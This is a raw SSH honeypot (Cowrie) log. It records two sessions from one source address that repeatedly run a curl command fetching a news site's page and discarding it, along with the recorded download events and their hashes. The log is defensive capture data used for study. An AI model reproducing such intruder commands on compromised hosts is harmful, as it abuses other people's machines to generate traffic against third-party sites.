{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.414169Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.415888Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.416810Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.432335Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.440167Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.462383Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.464078Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.465326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.468603Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.469500Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.511329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.512706Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.515308Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.516234Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.522552Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.532189Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.547027Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.548179Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.553675Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.554577Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.569353Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.597527Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.598747Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.602390Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.606109Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.607237Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.641855Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.642992Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.653499Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.654507Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.660786Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.687111Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.688315Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.705774Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.706977Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.737119Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.738179Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.758029Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.759137Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.785677Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.807374Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.812055Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.814202Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.852078Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.862280Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.863493Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.867431Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.883988Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.885104Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.958427Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.962891Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.964117Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:31.975244Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:31.976364Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.014518Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.016027Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.023638Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.024956Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.029612Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.061443Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.063036Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.068480Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.069835Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.075234Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.106798Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.108201Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.114457Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.115824Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.146600Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.150569Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.152035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.154259Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.164429Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.165846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.194884Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.196254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.218123Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.219387Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.236318Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.238467Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.242489Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.243979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.244995Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.255795Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.266725Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.268190Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.282276Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.284255Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.308856Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.311773Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.312991Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:32.340125Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:32.341155Z","src_ip":"212.227.125.160","session":"7541ed730449"}
